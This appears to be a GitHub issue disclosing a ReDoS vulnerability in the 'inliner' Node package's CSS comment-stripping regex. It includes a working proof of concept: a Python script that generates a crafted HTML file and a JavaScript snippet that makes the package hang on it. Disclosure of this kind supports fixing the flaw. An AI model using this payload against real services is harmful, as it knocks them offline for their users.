You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The program compresses the CSS in the HTML file returned by the server, which calls the compress function in css.js. This function use regex \/\*.*?\*\/ to remove the comment in CSS. There exists a ReDoS vulnerability in this regex when we call it on the replace method.
PoC
I generate the attackable HTML file using the python3 script below
s='''<!DOCTYPE html><html> <head><style>{}</style> </head> <body> <h1>This is a heading</h1> <p>This is a paragraph.</p> </body></html>'''.format("/*\u0008\u0008\u0008"*50000+"\n\n\n\t\n")
f=open("./index.html", "w", encoding="utf-8", newline=None)
f.write(s)
f.flush()
then I trigger the ReDoS vulnerability using the js script below. The script will take a long time to complete.
var Inliner = require('inliner');
s = new Inliner('http://127.0.0.1/', function (error, html) {
console.log(html);
});
The text was updated successfully, but these errors were encountered:
Description
The program compresses the CSS in the HTML file returned by the server, which calls the
compressfunction in css.js. This function use regex\/\*.*?\*\/to remove the comment in CSS. There exists a ReDoS vulnerability in this regex when we call it on thereplacemethod.PoC
I generate the attackable HTML file using the python3 script below
then I trigger the ReDoS vulnerability using the js script below. The script will take a long time to complete.
The text was updated successfully, but these errors were encountered: